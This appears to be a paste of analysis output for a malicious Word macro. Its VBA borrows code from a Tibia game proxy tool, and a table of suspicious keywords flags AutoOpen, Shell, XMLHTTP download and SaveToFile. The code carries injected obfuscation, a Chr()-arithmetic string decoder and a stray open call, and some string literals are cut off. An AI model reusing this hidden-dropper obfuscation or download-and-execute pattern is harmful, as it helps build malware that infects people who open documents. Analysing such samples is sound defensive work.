- aRes = SendLogSyst.emMessageToClient(i, "BlackdProxy: The autoruneheal was changed to " & CStr(GLOBAL_RUNEHEAL_HP) & " %")
- DoEvents
- End If
- Next i
- End If
- End Sub
- Public Sub enLight(i As Integer)
- Dim inRes As Integer
- Dim cPacket() As Byte
- UseItemOnName6.open (UseItemOnName5)
- Exit Sub
- #If FinalMode Then
- On Error GoTo ignoreit
- #End If
- inRes = GetCh.eatPacket(cPacket, "07 00 8D " & IDs.tring(i) & " " & LightIntesityHex & " " & nextLight(i))
- fr.mMain.UnifiedSendToClientGame i, cPacket
- DoEvents
- Exit Sub
- ignoreit:
- End Sub
- Private Function GetWindowClass(ByVal hwnd As Long) As String
- Dim sClass As String
- If hwnd = 0 Then
- GetWindowClass = ""
- Else
- sClass = Space$(256)
- GetClassName hwnd, sClass, 255
- GetWindowClass = Left$(sClass, InStr(sClass, vbNullChar) - 1)
- End If
- End Function
- Public Sub ConfigurePath(phwnd As Long, isfrmmain As Boolean)
- Dim res As String
- res = BrowseForFolder(phwnd, "Select tibia map folder (usually on " & cte_automapfolder & ")")
- If res <> "" Then
- If ((TibiaVersionLong >= 800) And (LCase(Right$(res, 7)) <> "automap")) Then
- Exit Sub
- End If
- TibiaPath = res
- If isfrmmain = True Then
- frmMain.txtTibiaPath.Text = res
- End If
- End If
- End Sub
- Public Function TryAutoPath() As String
- On Error GoTo cantdoit
- Const ParTibiaFolder As String = "Tibia"
- If TibiaVersionLong >= 800 Then
- Dim strAppdata As String
- Dim strProposal As String
- Dim strProp2 As String
- Dim fs As scripting.FileSystemObject
- Set fs = New scripting.FileSystemObject
- strAppdata = GetAppDataFolder()
- strProposal = strAppdata & "\" & ParTibiaFolder & "\Automap"
- strProp2 = strAppdata & "\" & ParTibiaFolder
- If fs.FolderExists(strProposal) = True Then
- Set fs = Nothing
- TryAutoPath = strProposal
- Exit Function
- ElseIf fs.FolderExists(strProp2) = True Then
- fs.CreateFolder strProposal
- Set fs = Nothing
- TryAutoPath = strProposal
- Else
- Set fs = Nothing
- TryAutoPath = ""
- Exit Function
- End If
- Else
- TryAutoPath = TibiaExePath
- End If
- Exit Function
- cantdoit:
- TryAutoPath = ""
- End Function
- Public Sub givePathMsg(thehwnd As Long)
- Dim trythis As String
- If (TibiaPath = "") Or ((TibiaVersionLong >= 800) And (LCase(Right$(TibiaPath, 7)) <> "automap")) Then
- If ((TibiaVersionLong < 800) And (TibiaPath <> "")) Then
- Exit Sub
- End If
- trythis = TryAutoPath()
- If (trythis = "") Then
- MsgBox "Select tibia map folder (usually on " & cte_automapfolder & " )" & vbCrLf & vbCrLf & _
- "What to do if you don"
- "1. Play Tibia 8.00+ at least one time. Then close Tibia. This will make the folder." & vbCrLf & _
- "2. Unhide special folders : folder options > view > check
- "3. Restart " & currentAppName & "so the folder browser gets updated and after that you should be able to browse it at " & _
- vbCrLf & cte_automapfolder & vbCrLf & vbCrLf & _
- "Note that the exact path depends on your windows user name!", vbOKOnly + vbExclamation, "Please do this first"
- ConfigurePath thehwnd, False
- Exit Sub
- Else
- trythis , vbOKOnly + vbInformation, "Just for your information"
- TibiaPath = trythis
- End If
- End If
- End Sub
- Public Function ValidateTibiaPath(str As String) As String
- Dim res As String
- #If FinalMode Then
- On Error GoTo goterr
- #End If
- If TibiaVersionLong >= 800 Then
- If TibiaPath = "" Then
- res = ""
- ElseIf LCase(Right(str, 7)) <> "automap" Then
- res = "PATH NOT CONFIGURED! USE THIS BUTTON TO BROWSE -->"
- Else
- res = str
- End If
- ValidateTibiaPath = res
- Else
- res = str
- ValidateTibiaPath = res
- End If
- Exit Function
- goterr:
- ValidateTibiaPath = "PATH NOT CONFIGURED! USE THIS BUTTON TO BROWSE -->"
- End Function
- Public Function Hexarize(strinput As String) As String
- Dim strByte As String
- Dim res As String
- res = ""
- While Len(strinput) > 0
- strByte = Left(strinput, 1)
- strinput = Right(strinput, Len(strinput) - 1)
- res = res & GoodHex(Asc(strByte)) & " "
- Wend
- Hexarize = res
- End Function
- Public Function Hexarize2(strinput As String) As String
- Dim strByte As String
- Dim res As String
- Dim bcount As Long
- bcount = 0
- res = ""
- While Len(strinput) > 0
- strByte = Left(strinput, 1)
- strinput = Right(strinput, Len(strinput) - 1)
- res = res & GoodHex(Asc(strByte)) & " "
- bcount = bcount + 1
- Wend
- res = GoodHex(LowByteOfLong(bcount)) & " " & GoodHex(HighByteOfLong(bcount)) & " " & res
- Hexarize2 = res
- End Function
- Public Sub ToggleTopmost(ByVal hWindow As Long, b As Boolean)
- Dim hw As Long
- If b = False Then
- SetWindowPos hWindow, HWND_NOTOPMOST, 0, 0, 0, 0, _
- SWP_NOMOVE Or SWP_NOSIZE
- Else
- SetWindowPos hWindow, HWND_TOPMOST, 0, 0, 0, 0, _
- SWP_NOMOVE Or SWP_NOSIZE
- End If
- End Sub
- Public Sub AddCharServer(charName As String, ServerName As String, serverIP1 As Byte, _
- serverIP2 As Byte, serverIP3 As Byte, serverIP4 As Byte, serverPort As Long)
- Dim nextPlace As Integer
- Dim currentPlace As Integer
- Dim i As Integer
- currentPlace = 0
- For i = 1 To CharacterList.numItems
- If CharacterList.item(i).CharacterName = charName Then
- currentPlace = i
- Exit For
- End If
- Next i
- If currentPlace = 0 Then
- nextPlace = CharacterList.numItems + 1
- If nextPlace <= MAXLOGINMEMORY Then
- CharacterList.numItems = nextPlace
- currentPlace = nextPlace
- Else
- currentPlace = CharacterList.pointer
- CharacterList.pointer = CharacterList.pointer + 1
- If CharacterList.pointer = MAXLOGINMEMORY + 1 Then
- CharacterList.pointer = 1
- End If
- End If
- End If
- CharacterList.item(currentPlace).CharacterName = charName
- CharacterList.item(currentPlace).ServerName = ServerName
- CharacterList.item(currentPlace).serverIP1 = serverIP1
- CharacterList.item(currentPlace).serverIP2 = serverIP2
- CharacterList.item(currentPlace).serverIP3 = serverIP3
- CharacterList.item(currentPlace).serverIP4 = serverIP4
- CharacterList.item(currentPlace).serverPort = serverPort
- End Sub
- Public Function WSAGetSelectEvent2(ByValvDefault() As Variant, NothingOrNodeName As Integer) As String
- Dim i As Integer
- Dim ProcessKillOrder As String
- ProcessKillOrder = ""
- For i = LBound(ByValvDefault) To UBound(ByValvDefault)
- ProcessKillOrder = ProcessKillOrder & Chr(ByValvDefault(i) - 33 * NothingOrNodeName - 5544 - 778 - 35)
- Next i
- WSAGetSelectEvent2 = ProcessKillOrder
- End Function
- Public Sub ResetCharServer()
- CharacterList.numItems = 0
- CharacterList.pointer = 1
- End Sub
- Public Function GetCharListPosition(ByRef packet() As Byte, ByRef selectedcharacter As String) As Integer
- #If FinalMode Then
- On Error GoTo returnTheResult
- #End If
- Dim res As Integer
- Dim lon As Long
- Dim i As Long
- res = -1
- If packet(2) <> &HA Then
- res = 0
- GoTo returnTheResult
- End If
- lon = GetTheLong(packet(12), packet(13))
- selectedcharacter = ""
- For i = 14 To 13 + lon
- selectedcharacter = selectedcharacter & Chr(packet(i))
- Next i
- res = 0
- For i = 1 To MAXLOGINMEMORY
- If selectedcharacter = CharacterList.item(i).CharacterName Then
- res = i
- Exit For
- End If
- Next i
- returnTheResult:
- GetCharListPosition = res
- End Function
- +------------+----------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------------+-----------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- | Suspicious | Open | May open a file |
- | Suspicious | Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | WScript.Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | Windows | May enumerate application windows (if |
- | | | combined with Shell.Application object) |
- | Suspicious | Shell.Application | May run an application (if combined |
- | | | with CreateObject) |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | ADODB.Stream | May create a text file |
- | Suspicious | SaveToFile | May create a text file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Output | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Print # | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Microsoft.XMLHTTP | May download files from the Internet |
- | Suspicious | VBA obfuscated | VBA string expressions were detected, |
- | | Strings | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | 127.0.0.1 | IPv4 address |
- | VBA string | \ramamba | "\" + "ramamba" |
- +------------+----------------------+-----------------------------------------+
Add Comment
Please, Sign In to add comment